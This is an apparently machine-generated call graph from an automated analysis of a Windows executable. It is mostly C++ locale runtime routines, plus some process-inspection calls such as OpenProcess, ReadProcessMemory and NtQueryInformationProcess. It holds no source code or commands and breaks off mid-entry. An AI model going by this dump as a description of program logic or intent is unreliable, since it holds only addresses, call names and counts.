b3563d 33501->33503 34384 b35890 6 API calls 33503->34384 33504 b354b4 34382 b35b10 70 API calls 33504->34382 33510 b35721 33505->33510 33511 b3570e WaitForSingleObject GetExitCodeProcess 33505->33511 33513 b3568a AllowSetForegroundWindow 33506->33513 33507->33492 33507->33497 34377 b35940 33510->34377 33511->33510 33513->33505 33514 b35698 33513->33514 33514->33505 33515 b356a1 GetModuleHandleW GetProcAddress 33514->33515 33516 b356b4 33515->33516 33517 b356fa 33515->33517 33521 b356c8 Sleep EnumWindows 33516->33521 33522 b356ed 33516->33522 33517->33505 33519 b52937 __ehhandler$___std_fs_copy_file@12 5 API calls 33520 b357a8 33519->33520 33520->33278 33521->33516 33521->33522 34454 b35830 GetWindowThreadProcessId GetWindowLongW 33521->34454 33522->33517 33523 b356f3 BringWindowToTop 33522->33523 33523->33517 33526 b35e18 33525->33526 33527 b35ebe GetLastError 33525->33527 33526->33263 33526->33264 33527->33526 33529 b35ec9 33527->33529 33528 b35ed9 _Getvals 33530 b35f0e GetTokenInformation 33528->33530 33529->33528 33529->33530 33531 b35ee9 33529->33531 33530->33526 33534 b360d0 45 API calls 3 library calls 33531->33534 33533 b35ef2 33533->33530 33534->33533 33540->33393 33541->33399 33542->33403 33543->33396 33544->33400 33545->33404 33546->33412 33547->33412 33548->33412 33549->33417 33550->33419 33551->33421 33603 b31480 5 API calls 2 library calls 33553->33603 33555 b3135f 33556 b31368 33555->33556 33557 b3141c 33555->33557 33559 b31451 33556->33559 33560 b313a6 33556->33560 33558 b3141a 33557->33558 33563 b324c0 47 API calls 33557->33563 33561 b52937 __ehhandler$___std_fs_copy_file@12 5 API calls 33558->33561 33604 b31a60 42 API calls 33559->33604 33565 b324c0 47 API calls 33560->33565 33564 b3144d 33561->33564 33563->33558 33564->33465 33566 b313c6 33565->33566 33567 b313db 33566->33567 33570 b32e60 42 API calls 33566->33570 33569 b32e60 42 API calls 33567->33569 33569->33558 33570->33567 33578 b338e7 CloseHandle 33577->33578 33579 b3393e _Getvals 33577->33579 33580 b33925 33578->33580 33581 b33afd 33578->33581 33582 b3394e Process32FirstW 33579->33582 33580->33581 33583 b52937 __ehhandler$___std_fs_copy_file@12 5 API calls 33581->33583 33584 b33ab0 33582->33584 33596 b3396d 33582->33596 33585 b33b49 33583->33585 33584->33581 33586 b33aef CloseHandle 33584->33586 33585->33465 33586->33581 33587 b33970 OpenProcess 33587->33596 33588 b33a8e FindCloseChangeNotification 33590 b33a9b Process32NextW 33588->33590 33590->33584 33590->33587 33591 b324c0 47 API calls 33591->33596 33592 b33b51 33635 b3d305 RaiseException Concurrency::cancel_current_task 33592->33635 33595 b32e60 42 API calls 33595->33596 33596->33587 33596->33588 33596->33590 33596->33591 33596->33592 33596->33595 33597 b33a68 33596->33597 33605 b33c20 33596->33605 33630 b344a0 33596->33630 33597->33596 33634 b340b0 69 API calls 3 library calls 33597->33634 33600->33463 33603->33555 33636 b336d0 GetSystemDirectoryW 33605->33636 33608 b33ca2 GetProcAddress 33609 b33cb6 NtQueryInformationProcess 33608->33609 33610 b33f34 GetLastError 33608->33610 33612 b33cd6 _Getvals 33609->33612 33617 b33d13 33609->33617 33610->33617 33611 b33f8b 33614 b52937 __ehhandler$___std_fs_copy_file@12 5 API calls 33611->33614 33616 b33ce9 ReadProcessMemory 33612->33616 33613 b33f7b FreeLibrary 33613->33611 33615 b33fa4 33614->33615 33615->33596 33616->33617 33618 b33d5b _Getvals 33616->33618 33617->33611 33617->33613 33619 b33d68 ReadProcessMemory 33618->33619 33619->33617 33620 b33db1 33619->33620 33620->33617 33622 b33e83 33620->33622 33623 b33e15 33620->33623 33621 b33e95 ReadProcessMemory 33625 b33eda 33621->33625 33629 b33ef2 33621->33629 33658 b31bd0 45 API calls 2 library calls 33622->33658 33623->33621 33626 b32e60 42 API calls 33625->33626 33626->33629 33627 b32e60 42 API calls 33628 b33f2f 33627->33628 33628->33610 33629->33627 33631 b344b4 33630->33631 33663 b38220 33631->33663 33634->33597 33637 b33743 33636->33637 33645 b337d2 33636->33645 33638 b32310 56 API calls 33637->33638 33637->33645 33641 b33753 33638->33641 33639 b33823 33642 b52937 __ehhandler$___std_fs_copy_file@12 5 API calls 33639->33642 33640 b3381a GetLastError 33640->33639 33643 b33851 33641->33643 33644 b3375d 33641->33644 33646 b33847 33642->33646 33662 b311d0 RaiseException Concurrency::cancel_current_task 33643->33662 33649 b346f0 52 API calls 33644->33649 33645->33639 33645->33640 33646->33608 33646->33617 33651 b33778 33649->33651 33650 b3379e 33660 b34500 42 API calls ___crtCompareStringW 33650->33660 33651->33650 33651->33651 33659 b34ac0 42 API calls 3 library calls 33651->33659 33653 b337b1 33661 b34500 42 API calls ___crtCompareStringW 33653->33661 33656 b337c0 _wcschr 33656->33645 33657 b337d6 LoadLibraryExW 33656->33657 33657->33645 33658->33621 33659->33650 33660->33653 33661->33656 33670 b39910 33663->33670 33665 b38253 33666 b344cf 33665->33666 33668 b382a9 33665->33668 33666->33596 33667 b38610 73 API calls std::locale::_Locimp::_Makeushloc 33667->33668 33668->33665 33668->33667 33669 b38313 33668->33669 33669->33666 33691 b40df9 33670->33691 33672 b39942 33697 b39730 33672->33697 33674 b39991 33675 b399c5 33674->33675 33676 b399ba 33674->33676 33678 b399f5 33674->33678 33677 b52937 __ehhandler$___std_fs_copy_file@12 5 API calls 33675->33677 33676->33675 33679 b399be LocalFree 33676->33679 33680 b399ef 33677->33680 33733 b57027 41 API calls 2 library calls 33678->33733 33679->33675 33680->33665 33734 b36330 LocalAlloc 33691->33734 33693 b40e04 33694 b40e18 33693->33694 33735 b40b7c 14 API calls std::_Locinfo::_Locinfo_Addcats 33693->33735 33694->33672 33696 b40e16 33696->33672 33736 b40c94 33697->33736 33699 b39768 33748 b40ed6 33699->33748 33705 b40df9 std::locale::_Init 15 API calls 33706 b39942 33705->33706 33709 b39730 93 API calls 33706->33709 33711 b39991 33709->33711 33712 b399c5 33711->33712 33715 b399ba 33711->33715 33718 b399f5 33711->33718 33716 b52937 __ehhandler$___std_fs_copy_file@12 5 API calls 33712->33716 33713 b398d7 33713->33674 33714 b3984f 33723 b39839 _Yarn 33714->33723 33838 b56c83 14 API calls ___free_lconv_mon 33714->33838 33715->33712 33719 b399be LocalFree 33715->33719 33721 b399ef 33716->33721 33840 b57027 41 API calls 2 library calls 33718->33840 33719->33712 33720 b398c3 33720->33713 33833 b3d362 33720->33833 33721->33674 33839 b39510 69 API calls 3 library calls 33723->33839 33734->33693 33735->33696 33737 b40ca0 __EH_prolog3 33736->33737 33738 b40ed6 std::_Lockit::_Lockit 7 API calls 33737->33738 33739 b40cab 33738->33739 33740 b40cdc 33739->33740 33741 b40df9 std::locale::_Init 15 API calls 33739->33741 33841 b40f2e 33740->33841 33743 b40cbe 33741->33743 33848 b40e1c 43 API calls std::locale::_Setgloballocale 33743->33848 33745 b40d1c moneypunct 33745->33699 33746 b40cc6 33849 b39610 33746->33849 33749 b40ee5 33748->33749 33750 b40eec 33748->33750 33853 b61cf9 6 API calls std::_Lockit::_Lockit 33749->33853 33751 b3978f 33750->33751 33854 b520e8 EnterCriticalSection 33750->33854 33751->33720 33754 b3f544 33751->33754 33855 b619d1 33754->33855 33757 b39610 std::_Locinfo::_Locinfo_Addcats 14 API calls 33758 b3f568 33757->33758 33860 b3f49f 33758->33860 33760 b397f5 33760->33723 33761 b3f57a 33760->33761 33762 b3f586 __EH_prolog3 33761->33762 33763 b3f5cd 33762->33763 34327 b38c20 9 API calls 2 library calls 33762->34327 33832 b3f6ad 33763->33832 34333 b38c20 9 API calls 2 library calls 33763->34333 33765 b3f737 33880 b50116 33765->33880 33767 b3f5a1 33768 b3f5d2 33767->33768 33769 b3f5a7 33767->33769 34331 b39270 73 API calls 6 library calls 33768->34331 34328 b36330 LocalAlloc 33769->34328 33772 b3f5f7 33776 b3f6b2 33772->33776 33777 b3f601 33772->33777 33774 b3f70d 33781 b3f713 33774->33781 33782 b3f73c 33774->33782 33775 b3f75b 33986 b48e9a 33775->33986 34343 b3d752 72 API calls 7 library calls 33776->34343 34334 b36330 LocalAlloc 33777->34334 33780 b3f5ae 33787 b3f5c1 33780->33787 34329 b38fe0 41 API calls __Getctype 33780->34329 34352 b36330 LocalAlloc 33781->34352 34354 b3d6bd 72 API calls 7 library calls 33782->34354 33785 b3f5d8 34332 b3f3d9 10 API calls 6 library calls 33785->34332 33786 b3f6b8 34344 b3f3d9 10 API calls 6 library calls 33786->34344 34330 b3f3d9 10 API calls 6 library calls 33787->34330 33789 b3f766 34158 b48969 33789->34158 33790 b3f608 34335 b3f3d9 10 API calls 6 library calls 33790->34335 33795 b3f71a 34353 b3f3d9 10 API calls 6 library calls 33795->34353 33797 b3f742 34355 b3f3d9 10 API calls 6 library calls 33797->34355 33798 b3f5e0 33798->33763 33799 b3f6c0 34345 b38c20 9 API calls 2 library calls 33799->34345 33800 b3f772 33807 b39610 std::_Locinfo::_Locinfo_Addcats 14 API calls 33800->33807 33805 b3f6cd 34346 b3d7e7 72 API calls 7 library calls 33805->34346 33810 b3f78b moneypunct 33807->33810 33808 b3f625 34336 b38c20 9 API calls 2 library calls 33808->34336 33810->33714 33812 b3f6d5 34347 b3f3d9 10 API calls 6 library calls 33812->34347 33813 b3f632 34337 b36330 LocalAlloc 33813->34337 33816 b3f6dd 34348 b38c20 9 API calls 2 library calls 33816->34348 33817 b3f63b 34338 b3f3d9 10 API calls 6 library calls 33817->34338 33819 b3f6ea 34349 b3d87c 72 API calls 8 library calls 33819->34349 33822 b3f659 34339 b38c20 9 API calls 2 library calls 33822->34339 33823 b3f6f2 34350 b3f3d9 10 API calls 6 library calls 33823->34350 33826 b3f666 34340 b36330 LocalAlloc 33826->34340 33828 b3f670 33829 b3f69b 33828->33829 34341 b3f098 42 API calls 4 library calls 33828->34341 34342 b3f3d9 10 API calls 6 library calls 33829->34342 33832->33765 34351 b38c20 9 API calls 2 library calls 33832->34351 34356 b3d28b 33833->34356 33837 b39909 33837->33705 33838->33723 33839->33720 33842 b61d07 33841->33842 33843 b40f38 33841->33843 33844 b61ce2 std::_Lockit::~_Lockit LeaveCriticalSection 33842->33844 33845 b520f6 std::_Lockit::~_Lockit LeaveCriticalSection 33843->33845 33847 b40f4b 33843->33847 33846 b61d0e 33844->33846 33845->33847 33846->33745 33847->33745 33848->33746 33850 b39640 33849->33850 33852 b3964a _Yarn 33849->33852 33851 b56c83 ~ctype 14 API calls 33850->33851 33850->33852 33851->33852 33852->33740 33853->33751 33854->33751 33856 b678ca std::_Lockit::_Lockit 5 API calls 33855->33856 33857 b619de 33856->33857 33858 b6177c std::_Locinfo::_Locinfo_dtor 68 API calls 33857->33858 33859 b3f550 33858->33859 33859->33757 33861 b3f4b1 33860->33861 33862 b3f539 33860->33862 33865 b3f4c3 33861->33865 33870 b3f4ca 33861->33870 33874 b3f4d6 33861->33874 33863 b3d362 std::_Locinfo::_Locinfo_Addcats 42 API calls 33862->33863 33864 b3f543 33863->33864 33866 b619d1 std::_Locinfo::_Locinfo_dtor 68 API calls 33864->33866 33867 b619d1 std::_Locinfo::_Locinfo_dtor 68 API calls 33865->33867 33869 b3f550 33866->33869 33867->33870 33868 b39610 std::_Locinfo::_Locinfo_Addcats 14 API calls 33871 b3f533 33868->33871 33876 b39610 std::_Locinfo::_Locinfo_Addcats 14 API calls 33869->33876 33870->33868 33870->33871 33871->33760 33872 b619d1 std::_Locinfo::_Locinfo_dtor 68 API calls 33872->33874 33873 b3f4f8 33875 b619d1 std::_Locinfo::_Locinfo_dtor 68 API calls 33873->33875 33874->33872 33874->33873 33875->33870 33877 b3f568 33876->33877 33878 b3f49f std::_Locinfo::_Locinfo_Addcats 69 API calls 33877->33878 33879 b3f574 33878->33879 33879->33760 33881 b50122 __EH_prolog3 33880->33881 33882 b4edf2 collate 74 API calls 33881->33882 33883 b5012b 33882->33883 33884 b38c20 std::locale::_Locimp::_Makeushloc 9 API calls 33883->33884 33918 b50185 33883->33918 33885 b5014b 33884->33885 33888 b5014f 33885->33888 33889 b5018a 33885->33889 33886 b38c20 std::locale::_Locimp::_Makeushloc 9 API calls 33890 b501ae 33886->33890 33887 b501d8 33891 b38c20 std::locale::_Locimp::_Makeushloc 9 API calls 33887->33891 33892 b50320 33887->33892 33893 b36330 moneypunct LocalAlloc 33888->33893 33899 b4e843 std::locale::_Locimp::_Makeloc 74 API calls 33889->33899 33894 b501b4 33890->33894 33895 b501dd 33890->33895 33896 b50203 33891->33896 33897 b38c20 std::locale::_Locimp::_Makeushloc 9 API calls 33892->33897 33898 b5041d moneypunct 33892->33898 33900 b50159 33893->33900 33901 b36330 moneypunct LocalAlloc 33894->33901 33905 b4e8d8 std::locale::_Locimp::_Makeloc 72 API calls 33895->33905 33902 b50325 33896->33902 33903 b5020d 33896->33903 33904 b503a2 33897->33904 33898->33775 33906 b50192 33899->33906 33907 b50171 33900->33907 33919 b52344 __Getcoll 41 API calls 33900->33919 33908 b501bb 33901->33908 33912 b4e96d std::locale::_Locimp::_Makeloc 72 API calls 33902->33912 33909 b36330 moneypunct LocalAlloc 33903->33909 33910 b50422 33904->33910 33911 b503a8 33904->33911 33913 b501e3 33905->33913 33914 b3f3d9 std::locale::_Locimp::_Locimp_Addfac 10 API calls 33906->33914 33924 b3f3d9 std::locale::_Locimp::_Locimp_Addfac 10 API calls 33907->33924 33928 b3f3d9 std::locale::_Locimp::_Locimp_Addfac 10 API calls 33908->33928 33920 b50214 33909->33920 33915 b4ebc1 std::locale::_Locimp::_Makeloc 73 API calls 33910->33915 33921 b36330 moneypunct LocalAlloc 33911->33921 33916 b5032b 33912->33916 33917 b3f3d9 std::locale::_Locimp::_Locimp_Addfac 10 API calls 33913->33917 33914->33918 33922 b50428 33915->33922 33923 b3f3d9 std::locale::_Locimp::_Locimp_Addfac 10 API calls 33916->33923 33917->33887 33918->33886 33918->33887 33919->33907 33932 b3f3d9 std::locale::_Locimp::_Locimp_Addfac 10 API calls 33920->33932 33925 b503af 33921->33925 33926 b3f3d9 std::locale::_Locimp::_Locimp_Addfac 10 API calls 33922->33926 33927 b50333 33923->33927 33924->33918 33929 b503c9 33925->33929 33933 b4eceb numpunct 44 API calls 33925->33933 33930 b50430 33926->33930 33931 b38c20 std::locale::_Locimp::_Makeushloc 9 API calls 33927->33931 33928->33887 33934 b3f3d9 std::locale::_Locimp::_Locimp_Addfac 10 API calls 33929->33934 33935 b38c20 std::locale::_Locimp::_Makeushloc 9 API calls 33930->33935 33936 b50340 33931->33936 33937 b50231 33932->33937 33933->33929 33938 b503d9 33934->33938 33939 b5043d 33935->33939 33940 b4ea02 std::locale::_Locimp::_Makeloc 72 API calls 33936->33940 33941 b38c20 std::locale::_Locimp::_Makeushloc 9 API calls 33937->33941 33943 b38c20 std::locale::_Locimp::_Makeushloc 9 API calls 33938->33943 33944 b4ec56 std::locale::_Locimp::_Makeloc 72 API calls 33939->33944 33945 b50348 33940->33945 33942 b5023e 33941->33942 33946 b36330 moneypunct LocalAlloc 33942->33946 33947 b503e6 33943->33947 33948 b50445 33944->33948 33949 b3f3d9 std::locale::_Locimp::_Locimp_Addfac 10 API calls 33945->33949 33950 b50247 33946->33950 33951 b36330 moneypunct LocalAlloc 33947->33951 33952 b3f3d9 std::locale::_Locimp::_Locimp_Addfac 10 API calls 33948->33952 33953 b50350 33949->33953 33958 b3f3d9 std::locale::_Locimp::_Locimp_Addfac 10 API calls 33950->33958 33954 b503ef 33951->33954 33952->33898 33955 b38c20 std::locale::_Locimp::_Makeushloc 9 API calls 33953->33955 33956 b50411 33954->33956 33959 b500ed std::locale::_Locimp::_Makeloc 14 API calls 33954->33959 33957 b5035d 33955->33957 33963 b3f3d9 std::locale::_Locimp::_Locimp_Addfac 10 API calls 33956->33963 33960 b4eb2c std::locale::_Locimp::_Makeloc 72 API calls 33957->33960 33961 b50265 33958->33961 33959->33956 33962 b50365 33960->33962 33964 b38c20 std::locale::_Locimp::_Makeushloc 9 API calls 33961->33964 33965 b3f3d9 std::locale::_Locimp::_Locimp_Addfac 10 API calls 33962->33965 33963->33898 33966 b50272 33964->33966 33967 b5036d 33965->33967 33968 b36330 moneypunct LocalAlloc 33966->33968 33969 b38c20 std::locale::_Locimp::_Makeushloc 9 API calls 33967->33969 33971 b5027c 33968->33971 33970 b5037a 33969->33970 33972 b4ea97 std::locale::_Locimp::_Makeloc 72 API calls 33970->33972 33973 b502aa 33971->33973 33975 b4ffea moneypunct 42 API calls 33971->33975 33974 b50382 33972->33974 33976 b3f3d9 std::locale::_Locimp::_Locimp_Addfac 10 API calls 33973->33976 33977 b3f3d9 std::locale::_Locimp::_Locimp_Addfac 10 API calls 33974->33977 33975->33973 33978 b502c2 33976->33978 33977->33892 33979 b38c20 std::locale::_Locimp::_Makeushloc 9 API calls 33978->33979 33980 b502cf 33979->33980 33981 b36330 moneypunct LocalAlloc 33980->33981 33982 b502d9 33981->33982 33983 b50308 33982->33983 33984 b4ffea moneypunct 42 API calls 33982->33984 33985 b3f3d9 std::locale::_Locimp::_Locimp_Addfac 10 API calls 33983->33985 33984->33983 33985->33892 33987 b48ea6 __EH_prolog3 33986->33987 33988 b48efb 33987->33988 33989 b38c20 std::locale::_Locimp::_Makeushloc 9 API calls 33987->33989 33992 b38c20 std::locale::_Locimp::_Makeushloc 9 API calls 33988->33992 34141 b48fde 33988->34141 33990 b48ec1 33989->33990 33993 b48ec6 33990->33993 33994 b48f00 33990->33994 33991 b43a6b collate 74 API calls 33995 b4903b 33991->33995 33996 b48f29 33992->33996 34001 b36330 moneypunct LocalAlloc 33993->34001 34000 b38610 std::locale::_Locimp::_Makeushloc 73 API calls 33994->34000 33997 b49091 33995->33997 34002 b38c20 std::locale::_Locimp::_Makeushloc 9 API calls 33995->34002 33998 b48f35 33996->33998 33999 b48fe3 33996->33999 34004 b490e9 33997->34004 34011 b38c20 std::locale::_Locimp::_Makeushloc 9 API calls 33997->34011 34003 b36330 moneypunct LocalAlloc 33998->34003 34006 b42c4a std::locale::_Locimp::_Makeushloc 72 API calls 33999->34006 34005 b48f0a 34000->34005 34007 b48ed0 34001->34007 34009 b49055 34002->34009 34010 b48f3c 34003->34010 34018 b38c20 std::locale::_Locimp::_Makeushloc 9 API calls 34004->34018 34019 b49231 34004->34019 34012 b3f3d9 std::locale::_Locimp::_Locimp_Addfac 10 API calls 34005->34012 34013 b48feb 34006->34013 34008 b48eed 34007->34008 34014 b38bd0 std::locale::_Locimp::_Makeushloc 41 API calls 34007->34014 34024 b3f3d9 std::locale::_Locimp::_Locimp_Addfac 10 API calls 34008->34024 34015 b49096 34009->34015 34016 b4905b 34009->34016 34033 b3f3d9 std::locale::_Locimp::_Locimp_Addfac 10 API calls 34010->34033 34017 b490bd 34011->34017 34020 b48f12 34012->34020 34021 b3f3d9 std::locale::_Locimp::_Locimp_Addfac 10 API calls 34013->34021 34014->34008 34030 b424b9 std::locale::_Locimp::_Makeushloc 74 API calls 34015->34030 34023 b36330 moneypunct LocalAlloc 34016->34023 34025 b490c5 34017->34025 34026 b490ee 34017->34026 34027 b49117 34018->34027 34028 b38c20 std::locale::_Locimp::_Makeushloc 9 API calls 34019->34028 34133 b4933a 34019->34133 34020->33988 34022 b48ff3 34021->34022 34031 b38c20 std::locale::_Locimp::_Makeushloc 9 API calls 34022->34031 34032 b49065 34023->34032 34024->33988 34034 b36330 moneypunct LocalAlloc 34025->34034 34039 b42678 std::locale::_Locimp::_Makeushloc 72 API calls 34026->34039 34035 b49236 34027->34035 34036 b49123 34027->34036 34037 b492bc 34028->34037 34029 b493ad moneypunct 34029->33789 34040 b490a0 34030->34040 34044 b49000 34031->34044 34045 b4907d 34032->34045 34057 b52344 __Getcoll 41 API calls 34032->34057 34046 b48f59 34033->34046 34047 b490cc 34034->34047 34041 b427a2 std::locale::_Locimp::_Makeushloc 72 API calls 34035->34041 34048 b36330 moneypunct LocalAlloc 34036->34048 34049 b492c4 34037->34049 34050 b4933f 34037->34050 34038 b38c20 std::locale::_Locimp::_Makeushloc 9 API calls 34051 b49381 34038->34051 34042 b490f6 34039->34042 34043 b3f3d9 std::locale::_Locimp::_Locimp_Addfac 10 API calls 34040->34043 34052 b4923e 34041->34052 34055 b3f3d9 std::locale::_Locimp::_Locimp_Addfac 10 API calls 34042->34055 34043->33997 34053 b3b700 std::locale::_Locimp::_Makeushloc 73 API calls 34044->34053 34068 b3f3d9 std::locale::_Locimp::_Locimp_Addfac 10 API calls 34045->34068 34054 b38c20 std::locale::_Locimp::_Makeushloc 9 API calls 34046->34054 34075 b3f3d9 std::locale::_Locimp::_Locimp_Addfac 10 API calls 34047->34075 34058 b4912a 34048->34058 34059 b36330 moneypunct LocalAlloc 34049->34059 34056 b42e9e std::locale::_Locimp::_Makeushloc 73 API calls 34050->34056 34060 b493b2 34051->34060 34061 b49389 34051->34061 34063 b3f3d9 std::locale::_Locimp::_Locimp_Addfac 10 API calls 34052->34063 34064 b4900a 34053->34064 34065 b48f66 34054->34065 34055->34004 34067 b49347 34056->34067 34057->34045 34084 b3f3d9 std::locale::_Locimp::_Locimp_Addfac 10 API calls 34058->34084 34069 b492cb 34059->34069 34066 b4238f std::locale::_Locimp::_Makeushloc 72 API calls 34060->34066 34062 b36330 moneypunct LocalAlloc 34061->34062 34070 b49390 34062->34070 34071 b49246 34063->34071 34072 b3f3d9 std::locale::_Locimp::_Locimp_Addfac 10 API calls 34064->34072 34073 b36330 moneypunct LocalAlloc 34065->34073 34074 b493ba 34066->34074 34076 b3f3d9 std::locale::_Locimp::_Locimp_Addfac 10 API calls 34067->34076 34068->33997 34077 b492e5 34069->34077 34085 b43114 numpunct 44 API calls 34069->34085 34078 b493a3 34070->34078 34086 b430aa codecvt 41 API calls 34070->34086 34079 b38c20 std::locale::_Locimp::_Makeushloc 9 API calls 34071->34079 34080 b49012 34072->34080 34081 b48f6f 34073->34081 34082 b3f3d9 std::locale::_Locimp::_Locimp_Addfac 10 API calls 34074->34082 34075->34004 34083 b4934f 34076->34083 34087 b3f3d9 std::locale::_Locimp::_Locimp_Addfac 10 API calls 34077->34087 34089 b3f3d9 std::locale::_Locimp::_Locimp_Addfac 10 API calls 34078->34089 34088 b49253 34079->34088 34090 b38c20 std::locale::_Locimp::_Makeushloc 9 API calls 34080->34090 34102 b3f3d9 std::locale::_Locimp::_Locimp_Addfac 10 API calls 34081->34102 34082->34029 34091 b38c20 std::locale::_Locimp::_Makeushloc 9 API calls 34083->34091 34092 b49147 34084->34092 34085->34077 34086->34078 34094 b492f5 34087->34094 34095 b428cc std::locale::_Locimp::_Makeushloc 72 API calls 34088->34095 34089->34029 34096 b4901f 34090->34096 34097 b4935c 34091->34097 34093 b38c20 std::locale::_Locimp::_Makeushloc 9 API calls 34092->34093 34098 b49154 34093->34098 34099 b38c20 std::locale::_Locimp::_Makeushloc 9 API calls 34094->34099 34100 b4925d 34095->34100 34101 b3b8b0 std::locale::_Locimp::_Makeushloc 75 API calls 34096->34101 34103 b3b500 std::locale::_Locimp::_Makeushloc 73 API calls 34097->34103 34104 b36330 moneypunct LocalAlloc 34098->34104 34105 b49302 34099->34105 34106 b3f3d9 std::locale::_Locimp::_Locimp_Addfac 10 API calls 34100->34106 34107 b49029 34101->34107 34108 b48f8c 34102->34108 34109 b49366 34103->34109 34110 b4915d 34104->34110 34111 b36330 moneypunct LocalAlloc 34105->34111 34112 b49265 34106->34112 34113 b3f3d9 std::locale::_Locimp::_Locimp_Addfac 10 API calls 34107->34113 34114 b38c20 std::locale::_Locimp::_Makeushloc 9 API calls 34108->34114 34115 b3f3d9 std::locale::_Locimp::_Locimp_Addfac 10 API calls 34109->34115 34124 b3f3d9 std::locale::_Locimp::_Locimp_Addfac 10 API calls 34110->34124 34116 b4930c 34111->34116 34117 b38c20 std::locale::_Locimp::_Makeushloc 9 API calls 34112->34117 34118 b49031 34113->34118 34119 b48f99 34114->34119 34120 b4936e 34115->34120 34121 b4932c 34116->34121 34125 b3bf80 std::locale::_Locimp::_Makeushloc 42 API calls 34116->34125 34122 b49272 34117->34122 34118->34141 34123 b36330 moneypunct LocalAlloc 34119->34123 34120->34133 34130 b3f3d9 std::locale::_Locimp::_Locimp_Addfac 10 API calls 34121->34130 34126 b42b20 std::locale::_Locimp::_Makeushloc 72 API calls 34122->34126 34127 b48fa3 34123->34127 34128 b4917a 34124->34128 34125->34121 34129 b4927c 34126->34129 34134 b3bd90 std::locale::_Locimp::_Makeushloc 44 API calls 34127->34134 34135 b48fcc 34127->34135 34131 b38c20 std::locale::_Locimp::_Makeushloc 9 API calls 34128->34131 34132 b3f3d9 std::locale::_Locimp::_Locimp_Addfac 10 API calls 34129->34132 34130->34133 34136 b49187 34131->34136 34137 b49284 34132->34137 34133->34029 34133->34038 34134->34135 34138 b3f3d9 std::locale::_Locimp::_Locimp_Addfac 10 API calls 34135->34138 34139 b36330 moneypunct LocalAlloc 34136->34139 34140 b38c20 std::locale::_Locimp::_Makeushloc 9 API calls 34137->34140 34138->34141 34142 b49191 34139->34142 34143 b49291 34140->34143 34141->33991 34144 b491bd 34142->34144 34146 b48451 std::locale::_Locimp::_Makeushloc 42 API calls 34142->34146 34145 b42a8b std::locale::_Locimp::_Makeushloc 72 API calls 34143->34145 34148 b3f3d9 std::locale::_Locimp::_Locimp_Addfac 10 API calls 34144->34148 34147 b4929b 34145->34147 34146->34144 34149 b3f3d9 std::locale::_Locimp::_Locimp_Addfac 10 API calls 34147->34149 34150 b491d5 34148->34150 34149->34019 34151 b38c20 std::locale::_Locimp::_Makeushloc 9 API calls 34150->34151 34152 b491e2 34151->34152 34153 b36330 moneypunct LocalAlloc 34152->34153 34154 b491ec 34153->34154 34155 b49219 34154->34155 34156 b48451 std::locale::_Locimp::_Makeushloc 42 API calls 34154->34156 34157 b3f3d9 std::locale::_Locimp::_Locimp_Addfac 10 API calls 34155->34157 34156->34155 34157->34019 34159 b48975 __EH_prolog3 34158->34159 34160 b489ca 34159->34160 34161 b38c20 std::locale::_Locimp::_Makeushloc 9 API calls 34159->34161 34164 b38c20 std::locale::_Locimp::_Makeushloc 9 API calls 34160->34164 34288 b48aad 34160->34288 34162 b48990 34161->34162 34165 b48995 34162->34165 34166 b489cf 34162->34166 34163 b439c9 collate 74 API calls 34167 b48b0a 34163->34167 34168 b489f8 34164->34168 34169 b36330 moneypunct LocalAlloc 34165->34169 34172 b4254e std::locale::_Locimp::_Makeushloc 72 API calls 34166->34172 34175 b38c20 std::locale::_Locimp::_Makeushloc 9 API calls 34167->34175 34242 b48b60 34167->34242 34170 b48a04 34168->34170 34171 b48ab2 34168->34171 34174 b4899f 34169->34174 34176 b36330 moneypunct LocalAlloc 34170->34176 34173 b42bb5 std::locale::_Locimp::_Makeushloc 72 API calls 34171->34173 34177 b489d9 34172->34177 34179 b48aba 34173->34179 34180 b489bc 34174->34180 34185 b4851c ctype 41 API calls 34174->34185 34181 b48b24 34175->34181 34182 b48a0b 34176->34182 34178 b3f3d9 std::locale::_Locimp::_Locimp_Addfac 10 API calls 34177->34178 34178->34160 34184 b3f3d9 std::locale::_Locimp::_Locimp_Addfac 10 API calls 34179->34184 34194 b3f3d9 std::locale::_Locimp::_Locimp_Addfac 10 API calls 34180->34194 34186 b48b65 34181->34186 34187 b48b2a 34181->34187 34205 b3f3d9 std::locale::_Locimp::_Locimp_Addfac 10 API calls 34182->34205 34183 b38c20 std::locale::_Locimp::_Makeushloc 9 API calls 34188 b48b8c 34183->34188 34192 b48ac2 34184->34192 34185->34180 34191 b42424 std::locale::_Locimp::_Makeushloc 74 API calls 34186->34191 34193 b36330 moneypunct LocalAlloc 34187->34193 34195 b48b94 34188->34195 34196 b48bbd 34188->34196 34189 b38c20 std::locale::_Locimp::_Makeushloc 9 API calls 34197 b48be6 34189->34197 34190 b48d00 34198 b38c20 std::locale::_Locimp::_Makeushloc 9 API calls 34190->34198 34290 b48e09 34190->34290 34201 b48b6f 34191->34201 34203 b38c20 std::locale::_Locimp::_Makeushloc 9 API calls 34192->34203 34204 b48b34 34193->34204 34194->34160 34206 b36330 moneypunct LocalAlloc 34195->34206 34202 b425e3 std::locale::_Locimp::_Makeushloc 72 API calls 34196->34202 34207 b48d05 34197->34207 34208 b48bf2 34197->34208 34199 b48d8b 34198->34199 34209 b48d93 34199->34209 34210 b48e0e 34199->34210 34200 b38c20 std::locale::_Locimp::_Makeushloc 9 API calls 34211 b48e50 34200->34211 34213 b3f3d9 std::locale::_Locimp::_Locimp_Addfac 10 API calls 34201->34213 34214 b48bc5 34202->34214 34216 b48acf 34203->34216 34217 b48b4c 34204->34217 34223 b52344 __Getcoll 41 API calls 34204->34223 34218 b48a28 34205->34218 34219 b48b9b 34206->34219 34215 b4270d std::locale::_Locimp::_Makeushloc 72 API calls 34207->34215 34220 b36330 moneypunct LocalAlloc 34208->34220 34224 b36330 moneypunct LocalAlloc 34209->34224 34221 b42e09 std::locale::_Locimp::_Makeushloc 75 API calls 34210->34221 34225 b48e81 34211->34225 34226 b48e58 34211->34226 34212 b48e7c moneypunct 34212->33800 34213->34242 34222 b3f3d9 std::locale::_Locimp::_Locimp_Addfac 10 API calls 34214->34222 34227 b48d0d 34215->34227 34228 b42cdf std::locale::_Locimp::_Makeushloc 72 API calls 34216->34228 34231 b3f3d9 std::locale::_Locimp::_Locimp_Addfac 10 API calls 34217->34231 34229 b38c20 std::locale::_Locimp::_Makeushloc 9 API calls 34218->34229 34239 b3f3d9 std::locale::_Locimp::_Locimp_Addfac 10 API calls 34219->34239 34243 b48bf9 34220->34243 34230 b48e16 34221->34230 34241 b48bb8 34222->34241 34223->34217 34245 b48d9a 34224->34245 34235 b422fa std::locale::_Locimp::_Makeushloc 72 API calls 34225->34235 34232 b36330 